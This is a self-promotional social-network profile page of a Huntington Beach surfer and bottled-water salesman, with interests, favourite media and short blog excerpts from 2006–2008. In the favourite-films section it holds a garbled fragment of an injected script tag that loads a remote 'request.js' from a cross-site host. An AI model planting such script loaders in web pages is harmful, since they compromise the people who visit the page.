H.B. Legend Chris The Waterman Ryan aka Hollywood profile picture

H.B. Legend Chris The Waterman Ryan aka Hollywood

I am here for Dating, Friends and Networking

About Me

Hey". Thank'x fer check'n my site". My name is Chris Ryan. But Im known as The Waterman, or "HOLLYWOOD" ! My main sourse of income is bottled drinking water sales, wich I've been doing off and on for about 20 years. Im also an avid surfer wich I've been doing for even longer. So as luck has it, I've become The Waterman. Beside'z being the most populer free or soel surfer out of H.B./Surf City. Im also, the most reputable bottled water salesman in the O.C. And "possably the world". I've had several write ups in magaziens, surf mags, and news papers. I've even had a couple of students from H.B.H.S. Do essays on me. I do things for radio, T.V. And anything else I can do to make my self into a freaking star. My spelling may "suck". But my marketing skills are "awsome" ! Im basicly a "MARKETING FUCKING MAD MAN" ! As you can see from my pictures, Im camera freandy and itz like this. The entertainment industry/Hollywood, needz a real deal surf legend,( I mean one that still/really surf'z). And Im the man to fill those shoes. I get help from LOST ENTERPRISES. (Look for me on their surf team page too. The DANK store Huntington Beach. Im a team rider of Rokin Fig surf head quarters of H.B. And am a Vandermeulen surfboards team rider too. Mike Reola at the Catalyst shop in San Clemete.(Where you'll find one of the phatest selections of clothing, and surfboards By LOST ENTERPRISES in the O.C.), also help'z me . Im now getting help with "LOST" energy drink'z too. (Witch by the way."KICK MAJOR ASS" !) All other surf eccessary'z ? I've been invalved in the surf industry fer quite some time so I get help with that as well'ski". Im supported by all the pro and semi profetional surfers out of H.B. As well as, from my groms too. ( Who I care for like my brother'z and sisters) .I get so much support, not just because of my surfing skills, but because I've got something special. And probubly because, most know I keep it real for H.B'z. old school. (Hell I've been here 35 yr'z, and Im one of the last remaining locals left. Most everyone else is either dead. Fat, out of shape with a wife and kid'z. Or moved on cuz H.B.'Z CHAINGED SO DRASTICLY). Then "of course". You've got the hater'z. "YEP", got then as well. And they give me support by talking smack about me too. "Again giving me more publicity". "H.B.'z FULL OF EM". ( They say no press is bad press ). Just ask the Hollywood celeb'z. Couple'a thing'z ta rember.#1. This site is mostly for pubulicity + marketing. All thoe I would like to hear what you think about me, my site. Or life in general. SO PLEASE SEND YOUR COMMENTS. And check this out.#2. If you happin to see me in the lineup. Dont be offended if I dont socialize with you. That'z not what Im their for. Im their to get a wave count. Hopefully, let my surfing do the talking, and then go to my next job. REMBER FOLKZ. "This is real". Give me a break" everyone. I dident just wake up with these skills and talants I've aquired. Its taken years of trials and tribulations to become who I am. Am I the best? Hell no". Some day'z my surfing "SUCK'Z".But if you'll look at my pic'z, Im not to bad for a guy they sead couldent make it in the industry. And am "by far", one of the better surfers at H.B. Pier. As you see, I can talk the talk. Lets see if I can walk the walk. This site'z "STRICTLY" for intertainment purpuses only. Althoe it'z real. Dont let it go to yer head"! "It'z just a job". Thanks everyone "very much" for yer support Home | Browse | Search | Invite | Film | Mail | Blog | Favorites | Forum | Groups | Events | Videos | Music | Comedy | Classifieds

My Interests

Surfing/exorciseing. Sales/marketing, "laughing". sunning.Acting and dazzeling or pleazing the crowd. Enjoy setting goels and especally accomplishing them.

I'd like to meet:

Let'z see who would I really like ta meet ? I enjoy meeting, people that treat me like an equal. That dont try'n put me down, because of their own insecurity'z, or just straight up jeliousy. I enjoy meeting people that are sucsessful, not just financially, but, in enjoying life. Especually, without drug'z or alcohal. "Im a vrey lucky man". I have been gifted with the ability to read, and see thing'z that most just will never figuer out. "Thank you god", for everything you've given me. Im enjoying life emencely, and really want to continue, my quest for success. P.S. Thank heaven, Im a "surfer". Amen . . .


I live for music".Especally like the music you can understand the lyric'z. Rember you only go around 1'ce, so Letz dance n sing".


Fast times at Ridgemont High, Tombstone, and Scarface. Most western'z, especally Young guns 1+2.Az well az anything with Clint Eastwood, his westerns really stoke me. Dont tell mom the baby sitterz dead, Sahara and Im sure theirs more. . . . ..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..


TmZ. But I dont understand. Harvy Leven'z a star now. "How come the poperatzie dosent stalk him" ? American Idel. Seinfeld, -(Seen just about all of em twice).America'z funniest vidio'z. Andy Griffith, Three's company. Jay Leno,Conan. Jimmy Kimmmel, Carson Daily and Craig Fergison. Who in my eye'z is the king of late night! Stand up on comedy central. N.B.A. Play off'z if the Lakers are in it. I.S.K, UFC, pride + boxing.(Especually heavy weight).Cooking shows like Emeral, but Rachel Ray shez a doll. Documentrys, nature. And Im sure theirs more. . .


I like reality books mostly. Reading natural cures at the time. But really, Someone needs to write a life story on me. cuz it would make a great movie. I'd do it myself but I've too much on my plate at the present time.


#1 ? Myself of course. And then, I also admire Mohamed Ali'z magic, style, and accomplishment'z ! I also appriceate the way the Rat pack handeled them self'z, and grabed Hollywood by the ball'z. But, ya cant forget. That fucking Rod Baron of Baron entertainment, Hollywood. The dewd'z live'n it "BIG" ! In other word'z babe. "HOLLYWOOD". Ya gotta love it . . . Also need'ta give a shout out to "ALL" the gnarly fucker'z, both men and women. In in U.S. Armed force'z. Puting their life'z on the line to protect our Country and the freedome of AMERICA ! I edited my profile with Thomas' Myspace Editor V4.4 ..

My Blog

The attempt to take my "celibrity status" to the next level .

Dewd". Im have'n so much fun. It'z an e-ticket ride. 0/7 ? Shit", that was just the start. Now the action'z just start'n ta began. I learned alot, and their a hell of alot more to learn. That'z what e...
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Fri, 04 Jan 2008 06:21:00 PST

Shout out to Coach Verdone, the H.B.H.S. Surf team. The pro'z. And all other'z " !

 Your support'z been overwheling. I love and respect you all". Your friend alway'z Watta . . .
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Thu, 13 Dec 2007 05:40:00 PST

Food fer thought . Who farted ? ! ! ? "CALL THE PAINTER" !

What'er some great food'z fer "FART'n ? I've been reserching this supject extencivly, and have found that brussel sprout'z and cream of mushroom soup'z a great combo, and pritty much work'z fer me. I'...
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Thu, 29 Nov 2007 06:06:00 PST

Etiquette'z and philosophy'z of surfing. The surfing lifestyle, and life in general .

Once upon a time their was a great life style concitered to be the surfing life style. This was ? And if one know'z how ? Is a great life style. It'z a lifestyle basicly revalving around a few simple ...
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Thu, 22 Nov 2007 12:36:00 PST


 Here'z the deal folk'z. I've got camera time. Their is a real resume available to you if interested. Im clean, prompt, profesional, and a busness man. I know how to work both the ...
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Tue, 10 Jul 2007 06:13:00 PST

mind boggle

Dose a bear shit in the wood'z ? Doze raggady Andy have cotton ball'z ? Dose the water ripple when a duck fart'z?  Dose a cat have an ass ? Dose a chicken have a pecker ? Is Todd Aimer the mouth ...
Posted by H.B. Legend Chris The Waterman Ryan aka Hollywood on Sun, 17 Sep 2006 04:34:00 PST